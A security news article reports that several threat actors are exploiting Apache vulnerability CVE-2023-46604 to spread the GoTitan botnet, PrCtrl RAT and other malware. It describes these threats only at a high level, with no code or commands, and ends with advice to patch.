- 칼럼 | AI 에이전트, 지금까지의 어떤 기술과도 다르다
- The $23 Echo Dot deal is a great deal to upgrade your smart home this Black Friday
- Amazon's Echo Spot smart alarm clock is almost half off this Black Friday
- The newest Echo Show 8 just hit its lowest price ever for Black Friday
- 기술 기업 노리는 북한의 가짜 IT 인력 캠페인··· 데이터 탈취도 주의해야
GoTitan Botnet and PrCtrl RAT Exploit Apache Vulnerability
Threat actors have been observed exploiting a critical vulnerability, CVE-2023-46604, in Apache systems.
Over the past few weeks, Fortiguard Labs identified multiple threat actors leveraging this vulnerability to unleash several malware strains.
Among the discoveries is the emergence of a newly discovered Golang-based botnet named GoTitan. This sophisticated botnet has raised concerns due to its ability to disseminate diverse malware strains.
GoTitan has been observed downloading from a malicious URL and exhibits a specific focus on x64 architectures. Furthermore, the malware, while still in an early stage of development, replicates itself within systems, establishes recurring execution through cron registration and collects essential information about compromised endpoints.
A .NET program called PrCtrl Rat has also surfaced as a cyber-threat targeting the Apache flaw. The malicious software, equipped with remote control capabilities, uses a .NET framework, allowing it to execute commands and potentially establish a persistent presence on compromised systems.
Furthermore, the researchers have pinpointed the presence of other familiar malware and tools in the ongoing exploits. Sliver, created as an advanced penetration testing tool and red teaming framework, has been used maliciously by threat actors. It supports diverse callback protocols such as DNS, TCP and HTTP(S), simplifying exit processes.
Fortiguard added that Kinsing has also established itself as a force in cryptojacking operations, demonstrating a swift ability to exploit newly uncovered vulnerabilities.
Read more on these attacks: Flaw in Apache ActiveMQ Exposes Linux Systems to Kinsing Malware
The team also identified Ddostf, a malware strain with a track record dating back to 2016, which maintains its adeptness in executing precise Distributed Denial of Service (DDoS) attacks, including using the mentioned Apache flaw.
According to an advisory published by Fortinet on Tuesday, the severity of the situation is highlighted by the fact that despite a critical advisory from Apache and the issuance of a patch over a month ago, threat actors persist in exploiting CVE-2023-46604.
“Users should remain vigilant against ongoing exploits by Sliver, Kinsing, and Ddostf,” reads the technical write-up. “It is crucial to prioritize system updates and patching and regularly monitor security advisories to effectively mitigate the risk of exploitation.”